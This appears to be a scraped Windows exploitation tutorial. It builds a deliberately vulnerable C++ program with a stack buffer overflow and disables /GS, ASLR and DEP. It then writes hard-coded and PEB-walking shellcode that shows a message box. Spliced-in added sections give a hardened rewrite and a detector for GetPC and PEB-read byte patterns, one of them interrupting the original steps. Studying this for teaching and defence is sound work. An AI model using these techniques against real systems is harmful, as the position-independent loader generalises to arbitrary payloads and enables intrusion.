Shellcode Getting Started (win)

Source: Internet
Author: User

One thing to say up front: for Windows security work, use a physical Windows machine. I ran into many problems on the Mac, and many function addresses were simply not available there. Shellcode is tied to its platform, so pay attention to which one you are on.

1. First, write a program with a buffer overflow

```cpp
// ConsoleApplication1.cpp: Defines the entry point of the console application.
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASSWORD "Allen"

// Deliberately vulnerable: nSize comes from the caller (0x200) but the
// buffer holds only 50 bytes, so memcpy runs past it and over the saved return address.
int VerifyPassword(char *pszPassword, int nSize)
{
    char szBuffer[50];
    memcpy(szBuffer, pszPassword, nSize);
    return strcmp(PASSWORD, szBuffer);
}

int _tmain(int argc, _TCHAR* argv[])
{
    int nFlag = 0;
    char szPassword[0x200];
    FILE *fp;

    LoadLibraryA("user32.dll");   // make sure user32 is mapped (MessageBoxA lives there)

    if (NULL == (fp = fopen("Password.txt", "rb")))
    {
        MessageBoxA(NULL, "Open file Failed", "error", MB_OK);
        exit(0);
    }
    fread(szPassword, sizeof(szPassword), 1, fp);
    nFlag = VerifyPassword(szPassword, sizeof(szPassword));   // passes 0x200, not the bytes read
    if (nFlag)
        printf("Password error\n");
    else
        printf("Password is correct\n");
    fclose(fp);
    system("pause");
    return 0;
}
```

To make the overflow usable in the lab, turn off a few protections in the project settings (the original post shows a screenshot of each):

1. Disable the security check (/GS-)
2. Turn off Randomized Base Address and Fixed Base Address in the linker options
3. Disable inline function expansion
4. Disable DEP

There is a definite overflow here.

Fill Password.txt with an easily recognisable pattern, so that whichever bytes land in the overwritten return address can be told apart:

Password.txt
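As an added example (not code from the original post), here is a hardened form of VerifyPassword next to the reason the original overflows. It uses no Win32 API so it builds anywhere; `password_length` and `check_overflow_pattern` are helpers assumed for this example, and the 0x200-byte input is constructed.

```c
#include <stddef.h>
#include <string.h>

#define PASSWORD "Allen"
#define BUFFER_SIZE 50   /* same 50-byte stack buffer as the page's VerifyPassword */

/* Hardened rewrite of VerifyPassword (added example, not the page's code).
 * The original copies nSize bytes (the caller passes sizeof(szPassword) = 0x200)
 * into a 50-byte buffer, so anything longer than 49 bytes runs over the saved
 * return address. Here the length is checked before the copy, the buffer is
 * always NUL-terminated, and over-long input is rejected instead of copied.
 * Returns 0 on match, 1 on mismatch, -1 if the input cannot fit. */
int verify_password_safe(const char *pszPassword, size_t nSize)
{
    char szBuffer[BUFFER_SIZE];

    if (pszPassword == NULL || nSize >= sizeof(szBuffer))
        return -1;
    memcpy(szBuffer, pszPassword, nSize);
    szBuffer[nSize] = '\0';
    return strcmp(PASSWORD, szBuffer) == 0 ? 0 : 1;
}

/* The page reads the whole 0x200-byte buffer and passes sizeof() as the length.
 * This helper computes the length a caller should pass instead: the bytes
 * actually read, cut at the first NUL or line break (Password.txt ends in one). */
size_t password_length(const char *data, size_t bytesRead)
{
    size_t n = 0;
    while (n < bytesRead && data[n] != '\0' && data[n] != '\r' && data[n] != '\n')
        n++;
    return n;
}

/* Feeds a constructed 0x200-byte over-long input (standing in for the page's
 * A8A9B8B9... pattern) through the hardened check: it is rejected, not copied. */
int check_overflow_pattern(void)
{
    char data[0x200];
    memset(data, 'A', sizeof(data));
    return verify_password_safe(data, password_length(data, sizeof(data)));
}
```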

A8A9B8B9C8C9D8D9E8E9F8F9G8G9H8H9I8I9J8J9K8K9L8L9N8N9M8M90000P8P9Q8Q9R8R9S8S9T8T9U8U9V8V9W8W9X8X9Y8Y9Z8Z9

Run the program: it overflows.

On Windows 10 there is one extra step to see the faulting (overflow) address, because it is recorded in the event log:

1. Open Control Panel and find Administrative Tools
2. Open Event Viewer
3. Open Windows Logs
4. Open Application and find the error entry for this program



Locate the address of MessageBoxA in OD (OllyDbg) and follow it with 20 zero bytes: five dwords, that is the return address plus the four parameters.


Run the program

Now write the first, purely local shellcode in code. The function addresses it uses are looked up in OD and hard-coded, so it only works on this machine.

```cpp
#include <windows.h>

int main()
{
    LoadLibraryA("user32.dll");
    __asm {
        sub esp, 0x60               // raise the stack frame
        jmp tag_shellcode           // skip the data below so it is not executed as instructions
        // [tag_next-0x1a] MessageBoxA address (looked up in OD on this machine)
        _asm _emit(0xb0) _asm _emit(0xf8) _asm _emit(0x56) _asm _emit(0x76)
        // [tag_next-0x16] ExitProcess address (looked up in OD on this machine)
        _asm _emit(0xe0) _asm _emit(0x3b) _asm _emit(0xa7) _asm _emit(0x75)
        // [tag_next-0x12] "Hello World!\0"
        _asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6c) _asm _emit(0x6c) _asm _emit(0x6f)
        _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6f) _asm _emit(0x72) _asm _emit(0x6c)
        _asm _emit(0x64) _asm _emit(0x21) _asm _emit(0x00)
    tag_shellcode:
        call tag_next
    tag_next:
        pop esi                     // GetPC: esi = address of tag_next
        xor edx, edx                // clear edx to 0
        lea edi, [esi - 0x12]       // get the string address
        mov eax, [esi - 0x1a]       // get the MessageBoxA address
        push edx                    // uType
        push edi                    // lpCaption
        push edi                    // lpText
        push edx                    // hWnd
        call eax                    // MessageBoxA
        mov eax, [esi - 0x16]       // get the ExitProcess address
        push edx                    // uExitCode
        call eax                    // ExitProcess
    }
    return 0;
}
```

Run

Now use the debugger to copy the opcodes at the corresponding addresses, from `sub esp, 0x60` through the final `call eax`.


```cpp
#include <windows.h>

int main()
{
    LoadLibraryA("user32.dll");
    // Opcodes copied from the debugger, from "sub esp, 0x60" through the final "call eax"
    char bShellcode[] = {
        "\x83\xEC\x60\xEB\x15"                                  // sub esp,0x60 ; jmp over the data
        "\xB0\xF8\x56\x76"                                      // MessageBoxA address
        "\xE0\x3B\xA7\x75"                                      // ExitProcess address
        "\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00"  // "Hello World!\0"
        "\xE8\x00\x00\x00\x00\x5E"                              // call tag_next ; pop esi
        "\x33\xD2\x8D\x7E\xEE\x8B\x46\xE6"                      // xor edx,edx ; lea edi,[esi-0x12] ; mov eax,[esi-0x1a]
        "\x52\x57\x57\x52\xFF\xD0"                              // push edx ; push edi ; push edi ; push edx ; call eax
        "\x8B\x46\xEA\x52\xFF\xD0"                              // mov eax,[esi-0x16] ; push edx ; call eax
    };
    __asm {
        lea eax, bShellcode         // jump into the byte array (only works with DEP disabled)
        push eax
        ret
    }
    return 0;
}
```

Run


Now put it into the file (Password.txt).

Find the address the data is copied to (that is, the value of EAX).

After the copy function runs, the overflow has happened and the saved return address has been changed.


Success

And here is the real shellcode: it carries no hard-coded addresses, but resolves GetProcAddress and LoadLibraryExA itself by walking the PEB and the export table.

```cpp
// ConsoleApplication2.cpp: Defines the entry point of the console application.
#include "stdafx.h"

int _tmain(int argc, _TCHAR* argv[])
{
    __asm {
        pushad
        sub esp, 0x100
        jmp tag_shellcode
        // [tag_next-0x53] "GetProcAddress\0" (15 bytes; fun_getprocaddress uses ebx-0x53)
        _asm _emit(0x47) _asm _emit(0x65) _asm _emit(0x74) _asm _emit(0x50) _asm _emit(0x72)
        _asm _emit(0x6f) _asm _emit(0x63) _asm _emit(0x41) _asm _emit(0x64) _asm _emit(0x64)
        _asm _emit(0x72) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
        // [tag_next-0x44] "LoadLibraryExA\0"
        _asm _emit(0x4c) _asm _emit(0x6f) _asm _emit(0x61) _asm _emit(0x64) _asm _emit(0x4c)
        _asm _emit(0x69) _asm _emit(0x62) _asm _emit(0x72) _asm _emit(0x61) _asm _emit(0x72)
        _asm _emit(0x79) _asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
        // [tag_next-0x35] "User32.dll\0"
        _asm _emit(0x55) _asm _emit(0x73) _asm _emit(0x65) _asm _emit(0x72) _asm _emit(0x33)
        _asm _emit(0x32) _asm _emit(0x2e) _asm _emit(0x64) _asm _emit(0x6c) _asm _emit(0x6c)
        _asm _emit(0x00)
        // [tag_next-0x2a] "MessageBoxA\0"
        _asm _emit(0x4d) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x61)
        _asm _emit(0x67) _asm _emit(0x65) _asm _emit(0x42) _asm _emit(0x6f) _asm _emit(0x78)
        _asm _emit(0x41) _asm _emit(0x00)
        // [tag_next-0x1e] "ExitProcess\0"
        _asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x69) _asm _emit(0x74) _asm _emit(0x50)
        _asm _emit(0x72) _asm _emit(0x6f) _asm _emit(0x63) _asm _emit(0x65) _asm _emit(0x73)
        _asm _emit(0x73) _asm _emit(0x00)
        // [tag_next-0x12] "Hello World!\0"
        _asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6c) _asm _emit(0x6c) _asm _emit(0x6f)
        _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6f) _asm _emit(0x72) _asm _emit(0x6c)
        _asm _emit(0x64) _asm _emit(0x21) _asm _emit(0x00)

    tag_shellcode:
        call tag_next
    tag_next:
        pop ebx                         // GetPC: ebx = address of tag_next (base of the data above)

        // get the base address of the critical module via the PEB
        // (the second entry of the initialization-order list; which DLL that is depends
        //  on the Windows version, but it exports GetProcAddress and LoadLibraryExA)
        mov esi, dword ptr fs:[0x30]    // PEB
        mov esi, [esi + 0x0c]           // PEB->Ldr
        mov esi, [esi + 0x1c]           // InInitializationOrderModuleList.Flink
        mov esi, [esi]                  // next entry
        mov edx, [esi + 0x08]           // DllBase

        // get the address of GetProcAddress
        push ebx                        // data block pointer
        push edx                        // module base
        call fun_getprocaddress
        mov esi, eax                    // esi = GetProcAddress

        // get the address of LoadLibraryExA
        push edx                        // save module base
        lea ecx, [ebx - 0x44]           // "LoadLibraryExA"
        push ecx
        push edx
        call eax                        // GetProcAddress(base, "LoadLibraryExA")
        pop edx                         // restore module base

        // call the payload part
        push ebx                        // data block pointer
        push esi                        // GetProcAddress
        push eax                        // LoadLibraryExA
        push edx                        // module base
        call fun_payload

    fun_getprocaddress:
        push ebp
        mov ebp, esp
        sub esp, 0x0c
        push edx
        // get the addresses of the EAT, ENT and EOT
        mov edx, [ebp + 0x08]           // module base
        mov esi, [edx + 0x3c]           // e_lfanew
        lea esi, [edx + esi]            // IMAGE_NT_HEADERS
        mov esi, [esi + 0x78]           // export directory RVA
        lea esi, [edx + esi]            // IMAGE_EXPORT_DIRECTORY
        mov edi, [esi + 0x1c]           // AddressOfFunctions (EAT)
        lea edi, [edx + edi]
        mov [ebp - 0x04], edi
        mov edi, [esi + 0x20]           // AddressOfNames (ENT)
        lea edi, [edx + edi]
        mov [ebp - 0x08], edi
        mov edi, [esi + 0x24]           // AddressOfNameOrdinals (EOT)
        lea edi, [edx + edi]
        mov [ebp - 0x0c], edi
        // loop: compare each name in the ENT with "GetProcAddress"
        xor eax, eax
        jmp tag_firstcmp
    tag_cmpfunnameloop:
        inc eax
    tag_firstcmp:
        mov esi, [ebp - 0x08]
        mov esi, [esi + eax * 4]        // RVA of the eax-th name
        mov edx, [ebp + 0x08]
        lea esi, [edx + esi]
        mov ebx, [ebp + 0x0c]
        lea edi, [ebx - 0x53]           // "GetProcAddress"
        mov ecx, 0x0e                   // compare 14 characters
        cld
        repe cmpsb
        jne tag_cmpfunnameloop
        // found: take the ordinal stored at the same index
        mov esi, [ebp - 0x0c]
        xor edi, edi
        mov di, [esi + eax * 2]
        // use the ordinal as the index into the EAT to get the function RVA
        mov edx, [ebp - 0x04]
        mov esi, [edx + edi * 4]
        mov edx, [ebp + 0x08]
        // return the absolute address of the key function
        lea eax, [edx + esi]
        pop edx
        mov esp, ebp
        pop ebp
        retn 0x08

    fun_payload:
        push ebp
        mov ebp, esp
        sub esp, 0x08
        mov ebx, [ebp + 0x14]           // data block pointer
        // get the address of MessageBoxA
        lea ecx, [ebx - 0x35]           // "User32.dll"
        push 0                          // dwFlags
        push 0                          // hFile
        push ecx                        // lpLibFileName
        call dword ptr [ebp + 0x0c]     // LoadLibraryExA
        lea ecx, [ebx - 0x2a]           // "MessageBoxA"
        push ecx
        push eax                        // hModule of user32
        call dword ptr [ebp + 0x10]     // GetProcAddress
        mov [ebp - 0x04], eax
        // get the address of ExitProcess
        lea ecx, [ebx - 0x1e]           // "ExitProcess"
        push ecx
        push dword ptr [ebp + 0x08]     // module base
        call dword ptr [ebp + 0x10]     // GetProcAddress
        mov [ebp - 0x08], eax
        // show the message
        lea ecx, [ebx - 0x12]           // "Hello World!"
        push 0                          // uType
        push ecx                        // lpCaption
        push ecx                        // lpText
        push 0                          // hWnd
        call dword ptr [ebp - 0x04]     // MessageBoxA
        push 0                          // uExitCode
        call dword ptr [ebp - 0x08]     // ExitProcess
        mov esp, ebp
        pop ebp
        retn 0x10
    }
    return 0;
}
```
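As an added detection-side example (not code from the original post), the following C program scans a byte buffer for two idioms the shellcode on this page depends on: the `call $+5` / `pop` GetPC trick used by the first shellcode (bytes E8 00 00 00 00 followed by a pop), and the `mov r32, fs:[0x30]` PEB read used by the second one. The first sample is the 52-byte `bShellcode[]` from this page; the PEB-read sample bytes and the function names are constructed for this example, and the encodings assumed are 32-bit x86.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed sample: the 52 shellcode bytes from this page's bShellcode[]. */
static const uint8_t kPageShellcode[] = {
    0x83,0xEC,0x60,0xEB,0x15,0xB0,0xF8,0x56,0x76,0xE0,0x3B,0xA7,0x75,
    0x48,0x65,0x6C,0x6C,0x6F,0x20,0x57,0x6F,0x72,0x6C,0x64,0x21,0x00,
    0xE8,0x00,0x00,0x00,0x00,0x5E,0x33,0xD2,0x8D,0x7E,0xEE,0x8B,0x46,
    0xE6,0x52,0x57,0x57,0x52,0xFF,0xD0,0x8B,0x46,0xEA,0x52,0xFF,0xD0
};
/* Constructed sample: a nop, then "mov esi, dword ptr fs:[0x30]" as in the second shellcode. */
static const uint8_t kPebRead[] = { 0x90, 0x64,0x8B,0x35,0x30,0x00,0x00,0x00 };

/* GetPC idiom: "call $+5" (E8 00000000) immediately followed by pop r32
 * (58..5F), e.g. the "call tag_next / pop esi" pair on this page.
 * Returns the offset of the call, or -1 if the idiom is absent. */
long find_getpc(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 6 <= len; i++) {
        if (buf[i] == 0xE8 && buf[i + 1] == 0 && buf[i + 2] == 0 &&
            buf[i + 3] == 0 && buf[i + 4] == 0 &&
            buf[i + 5] >= 0x58 && buf[i + 5] <= 0x5F)
            return (long)i;
    }
    return -1;
}

/* PEB read used to locate loaded modules without any import:
 *   64 A1 30 00 00 00      mov eax, fs:[0x30]
 *   64 8B /r 30 00 00 00   mov r32, fs:[0x30]  (ModRM mod=00, r/m=101 -> disp32)
 * Returns the offset of the FS prefix, or -1. */
long find_peb_read(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 6 <= len; i++) {
        if (buf[i] != 0x64) continue;
        if (buf[i + 1] == 0xA1 && buf[i + 2] == 0x30 && buf[i + 3] == 0 &&
            buf[i + 4] == 0 && buf[i + 5] == 0)
            return (long)i;
        if (i + 7 <= len && buf[i + 1] == 0x8B && (buf[i + 2] & 0xC7) == 0x05 &&
            buf[i + 3] == 0x30 && buf[i + 4] == 0 && buf[i + 5] == 0 && buf[i + 6] == 0)
            return (long)i;
    }
    return -1;
}

/* Convenience wrappers over the embedded samples. */
long page_shellcode_getpc(void) { return find_getpc(kPageShellcode, sizeof kPageShellcode); }
long page_shellcode_peb(void)   { return find_peb_read(kPageShellcode, sizeof kPageShellcode); }
long peb_sample_offset(void)    { return find_peb_read(kPebRead, sizeof kPebRead); }
```

The page's first shellcode matches only the GetPC check (the call sits at offset 26, right after the "Hello World!" string), while the constructed PEB sample matches only the FS-segment check; a buffer hitting both is the stronger signal.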
